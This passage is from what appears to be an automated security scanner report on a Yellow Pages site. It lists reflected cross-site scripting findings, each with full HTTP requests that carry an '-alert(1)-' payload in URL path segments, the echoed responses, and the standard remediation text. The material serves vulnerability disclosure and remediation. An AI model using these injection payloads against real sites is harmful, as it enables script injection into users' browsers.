Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common97191&quot;-alert(1)-&quot;a26cfc23980/css/spflyouts.1.0.css
Server: Unspecified
Set-Cookie: JSESSIONID=EA759A48641FB029323258B469F2D696; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:59 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common97191"-alert(1)-"a26cfc23980/css/spflyouts.1.0.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.580. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e3da"-alert(1)-"acb1d78ef25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css6e3da&quot;-alert(1)-&quot;acb1d78ef25/spflyouts.1.0.css
Server: Unspecified
Set-Cookie: JSESSIONID=D52748B2F7AE3B38F917957D6A181889; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:06 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css6e3da"-alert(1)-"acb1d78ef25/spflyouts.1.0.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.581. http://yellowpages.superpages.com/common/css/spflyouts.1.0.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/spflyouts.1.0.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa201"-alert(1)-"737b17cce6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/spflyouts.1.0.cssfa201&quot;-alert(1)-&quot;737b17cce6d
Server: Unspecified
Set-Cookie: JSESSIONID=69DC6403BFC862BADBDF43AFF539343B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:14 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/spflyouts.1.0.cssfa201"-alert(1)-"737b17cce6d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.582. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53209"-alert(1)-"19f62aec85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common53209"-alert(1)-"19f62aec85/css/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common53209&quot;-alert(1)-&quot;19f62aec85/css/sppromoads.css
Server: Unspecified
Set-Cookie: JSESSIONID=8E8F60E769287FC4C64A66BDCBA5CF11; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:45 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common53209"-alert(1)-"19f62aec85/css/sppromoads.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.583. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c53f7"-alert(1)-"f0b92738dcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssc53f7&quot;-alert(1)-&quot;f0b92738dcd/sppromoads.css
Server: Unspecified
Set-Cookie: JSESSIONID=85975BEBF5BE4BEC0876302A028AEC4B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:54 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssc53f7"-alert(1)-"f0b92738dcd/sppromoads.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.584. http://yellowpages.superpages.com/common/css/sppromoads.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/sppromoads.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6905"-alert(1)-"628f1c95393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/sppromoads.cssc6905&quot;-alert(1)-&quot;628f1c95393
Server: Unspecified
Set-Cookie: JSESSIONID=D69C3C5699393247BF29AC6893B9AA7D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:01 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/sppromoads.cssc6905"-alert(1)-"628f1c95393?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.585. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4770c"-alert(1)-"4414bf7cc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common4770c"-alert(1)-"4414bf7cc3/css/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common4770c&quot;-alert(1)-&quot;4414bf7cc3/css/structure.css
Server: Unspecified
Set-Cookie: JSESSIONID=B3A85C1803D19FCD2490D1349686EC11; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:26 GMT
Cache-Control: private
Content-Length: 36085


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common4770c"-alert(1)-"4414bf7cc3/css/structure.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.586. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee76"-alert(1)-"0d4decbeb19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssdee76&quot;-alert(1)-&quot;0d4decbeb19/structure.css
Server: Unspecified
Set-Cookie: JSESSIONID=ABCC92F3BBD93E038D6DE273AA54967F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:33 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssdee76"-alert(1)-"0d4decbeb19/structure.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.587. http://yellowpages.superpages.com/common/css/structure.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/structure.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/structure.cssb1738&quot;-alert(1)-&quot;099ed66255a
Server: Unspecified
Set-Cookie: JSESSIONID=E9374EE61141A9229E321BCE1DD67FDA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:41 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/structure.cssb1738"-alert(1)-"099ed66255a?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.588. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common992a6&quot;-alert(1)-&quot;25f8f156e7b/css/styles.css
Server: Unspecified
Set-Cookie: JSESSIONID=3211127661936C99371FE25634686EA3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:58 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common992a6"-alert(1)-"25f8f156e7b/css/styles.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.589. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssdd028&quot;-alert(1)-&quot;da24c435281/styles.css
Server: Unspecified
Set-Cookie: JSESSIONID=8987766902F63B3992E6CA214283A0CE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:06 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssdd028"-alert(1)-"da24c435281/styles.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.590. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/styles.css67e49&quot;-alert(1)-&quot;cece7288702
Server: Unspecified
Set-Cookie: JSESSIONID=3D234B69705369EA8A13C831B4DC2D38; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:15 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/styles.css67e49"-alert(1)-"cece7288702?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.591. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commondd884&quot;-alert(1)-&quot;66558d398fa/css/typography.css
Server: Unspecified
Set-Cookie: JSESSIONID=8C9E587A9A2B11245C4CB313D66A5039; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commondd884"-alert(1)-"66558d398fa/css/typography.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.592. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css6cec5&quot;-alert(1)-&quot;d776eed8f91/typography.css
Server: Unspecified
Set-Cookie: JSESSIONID=0FE3B1548143B2CCE3AB4A9092140C80; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:37 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css6cec5"-alert(1)-"d776eed8f91/typography.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.593. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/typography.cssc512b&quot;-alert(1)-&quot;208ebd640d3
Server: Unspecified
Set-Cookie: JSESSIONID=BE70921D9EFA0EDB349E547050E51902; Path=/
